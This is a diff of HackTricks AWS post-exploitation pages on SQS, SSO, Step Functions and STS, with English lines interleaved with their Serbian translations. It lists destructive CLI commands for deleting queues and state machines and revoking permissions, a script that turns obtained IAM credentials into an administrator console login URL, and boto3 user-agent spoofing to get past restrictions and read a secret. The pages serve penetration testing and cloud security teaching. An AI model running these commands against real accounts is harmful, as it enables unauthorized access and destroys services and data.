Napadač bi mogao da primi, obriše ili izmeni vidljivost poruka u SQS redu, uzrokujući gubitak poruka, oštećenje podataka ili prekid usluge za aplikacije koje se oslanjaju na te poruke.
```bash
aws sqs receive-message --queue-url <value>
aws sqs delete-message --queue-url <value> --receipt-handle <value>
aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> --visibility-timeout <value>
```
**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
**Potencijalni uticaj**: Ukrasti osetljive informacije, gubitak poruka, oštećenje podataka i prekid usluge za aplikacije koje se oslanjaju na pogođene poruke.
### `sqs:DeleteQueue`
An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.
Napadač bi mogao da obriše celu SQS red, uzrokujući gubitak poruka i utičući na aplikacije koje se oslanjaju na red.
```arduino
Copy codeaws sqs delete-queue --queue-url <value>
```
**Potential Impact**: Message loss and service disruption for applications using the deleted queue.
**Potencijalni uticaj**: Gubitak poruka i prekid usluge za aplikacije koje koriste obrisanu red.
### `sqs:PurgeQueue`
An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.
Napadač bi mogao da očisti sve poruke iz SQS reda, što bi dovelo do gubitka poruka i potencijalnog prekida aplikacija koje se oslanjaju na te poruke.
```arduino
Copy codeaws sqs purge-queue --queue-url <value>
```
**Potential Impact**: Message loss and service disruption for applications relying on the purged messages.
**Potencijalni uticaj**: Gubitak poruka i prekid usluge za aplikacije koje se oslanjaju na obrisane poruke.
### `sqs:SetQueueAttributes`
An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability.
Napadač bi mogao da izmeni atribute SQS reda, potencijalno utičući na njegovu performansu, bezbednost ili dostupnost.
```arduino
aws sqs set-queue-attributes --queue-url <value> --attributes <value>
```
**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
**Potencijalni uticaj**: Loše konfiguracije koje dovode do smanjenja performansi, bezbednosnih problema ili smanjene dostupnosti.
### `sqs:TagQueue` , `sqs:UntagQueue`
An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
Napadač bi mogao da doda, izmeni ili ukloni oznake sa SQS resursa, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
```bash
aws sqs tag-queue --queue-url <value> --tags Key=<key>,Value=<value>
aws sqs untag-queue --queue-url <value> --tag-keys <key>
```
**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
**Potencijalni uticaj**: Poremećaj alokacije troškova, praćenja resursa i politika kontrole pristupa zasnovanih na oznakama.
### `sqs:RemovePermission`
An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue.
Napadač bi mogao da opozove dozvole za legitimne korisnike ili usluge uklanjanjem politika povezanih sa SQS redom. To bi moglo dovesti do poremećaja u normalnom funkcionisanju aplikacija koje se oslanjaju na red.
```arduino
arduinoCopy codeaws sqs remove-permission --queue-url <value> --label <value>
```
**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions.
**Potencijalni uticaj**: Poremećaj normalnog funkcionisanja aplikacija koje se oslanjaju na red zbog neovlašćenog uklanjanja dozvola.
{{#include ../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## SSO & identitystore
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-iam-enum.md
@@ -12,8 +12,7 @@ For more information check:
### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment`
These permissions can be used to disrupt permissions:
Ove dozvole se mogu koristiti za ometanje dozvola:
```bash
aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
@@ -21,9 +20,4 @@ aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInst
aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>
```
{{#include ../../../banners/hacktricks-training.md}}

40
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Step Functions
For more information about this AWS service, check:
Za više informacija o ovoj AWS usluzi, proverite:
{{#ref}}
../aws-services/aws-stepfunctions-enum.md
@@ -12,20 +12,19 @@ For more information about this AWS service, check:
### `states:RevealSecrets`
This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true.
Ova dozvola omogućava **otkrivanje tajnih podataka unutar izvršenja**. Za to je potrebno postaviti nivo inspekcije na TRACE i parametar revealSecrets na true.
<figure><img src="../../../images/image (348).png" alt=""><figcaption></figcaption></figure>
### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
Napadač sa ovim dozvolama bi mogao trajno da obriše mašine stanja, njihove verzije i alias-e. To može ometati kritične radne tokove, dovesti do gubitka podataka i zahtevati značajno vreme za oporavak i vraćanje pogođenih mašina stanja. Pored toga, to bi omogućilo napadaču da prikrije tragove korišćene, ometa forenzičke istrage i potencijalno osakati operacije uklanjanjem bitnih automatizovanih procesa i konfiguracija stanja.
> [!NOTE]
>
> - Deleting a state machine you also delete all its associated versions and aliases.
> - Deleting a state machine alias you do not delete the state machine versions referecing this alias.
> - It is not possible to delete a state machine version currently referenced by one o more aliases.
> - Brisanjem mašine stanja takođe brišete sve njene povezane verzije i alias-e.
> - Brisanjem alias-a mašine stanja ne brišete verzije mašine stanja koje se odnose na ovaj alias.
> - Nije moguće obrisati verziju mašine stanja koja je trenutno referencirana od strane jednog ili više alias-a.
```bash
# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn <value>
@@ -34,45 +33,34 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn <valu
# Delete state machine alias
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
```
- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
- **Potencijalni Uticaj**: Poremećaj kritičnih radnih tokova, gubitak podataka i operativno zastoja.
### `states:UpdateMapRun`
An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
Napadač sa ovom dozvolom mogao bi da manipuliše konfiguracijom neuspeha Map Run-a i paralelnim podešavanjima, imajući mogućnost da poveća ili smanji maksimalan broj dozvoljenih izvršenja radnih tokova, što direktno utiče na performanse usluge. Pored toga, napadač bi mogao da manipuliše tolerisanim procentom neuspeha i brojem, imajući mogućnost da smanji ovu vrednost na 0, tako da svaki put kada stavka ne uspe, ceo map run bi neuspeo, što direktno utiče na izvršenje mašine stanja i potencijalno ometa kritične radne tokove.
```bash
aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
```
- **Potential Impact**: Performance degradation, and disruption of critical workflows.
- **Potencijalni uticaj**: Smanjenje performansi i prekid kritičnih radnih tokova.
### `states:StopExecution`
An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
Napadač sa ovom dozvolom mogao bi da zaustavi izvršenje bilo koje mašine stanja, ometajući tekuće radne tokove i procese. To bi moglo dovesti do nepotpunih transakcija, obustavljenih poslovnih operacija i potencijalne korupcije podataka.
> [!WARNING]
> This action is not supported by **express state machines**.
> Ova akcija nije podržana od strane **express state machines**.
```bash
aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
```
- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
- **Potencijalni uticaj**: Poremećaj tekućih radnih tokova, operativno vreme zastoja i potencijalna korupcija podataka.
### `states:TagResource`, `states:UntagResource`
An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
Napadač bi mogao da doda, izmeni ili ukloni oznake sa resursa Step Functions, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
```bash
aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
```
**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
**Potencijalni uticaj**: Poremećaj u alokaciji troškova, praćenju resursa i politikama kontrole pristupa zasnovanim na oznakama.
{{#include ../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
View File

@@ -4,21 +4,20 @@
## STS
For more information:
Za više informacija:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
### From IAM Creds to Console
### Od IAM kredencijala do konzole
If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
Note that the the user/role must have the permission **`sts:GetFederationToken`**.
Ako ste uspeli da dobijete neke IAM kredencijale, možda ćete biti zainteresovani za **pristup web konzoli** koristeći sledeće alate.\
Napomena: korisnik/rola mora imati dozvolu **`sts:GetFederationToken`**.
#### Custom script
The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
#### Prilagođeni skript
Sledeći skript će koristiti podrazumevani profil i podrazumevanu AWS lokaciju (ne gov i ne cn) da vam da potpisanu URL adresu koju možete koristiti za prijavu u web konzolu:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
@@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi
# Parse the output
@@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation"
# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
@@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
#### aws_consoler
You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
Možete **generisati link za web konzolu** sa [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
```bash
cd /tmp
python3 -m venv env
@@ -67,27 +64,23 @@ source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console
```
> [!WARNING]
> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
> Osigurajte da IAM korisnik ima `sts:GetFederationToken` dozvolu, ili obezbedite ulogu koju treba preuzeti.
#### aws-vault
[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
[**aws-vault**](https://github.com/99designs/aws-vault) je alat za sigurno čuvanje i pristup AWS akreditivima u razvojnog okruženju.
```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```
> [!NOTE]
> You can also use **aws-vault** to obtain an **browser console session**
> Možete takođe koristiti **aws-vault** da dobijete **sesiju konzole pretraživača**
### **Bypass User-Agent restrictions from Python**
If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
### **Obilaženje ograničenja User-Agent iz Pythona**
Ako postoji **ograničenje za izvođenje određenih akcija na osnovu korisničkog agenta** koji se koristi (kao što je ograničavanje korišćenja python boto3 biblioteke na osnovu korisničkog agenta), moguće je koristiti prethodnu tehniku da **povežete se na web konzolu putem pretraživača**, ili možete direktno **modifikovati boto3 korisnički agent** tako što ćete uraditi:
```bash
# Shared by ex16x41
# Create a client
@@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda
# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
```
{{#include ../../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More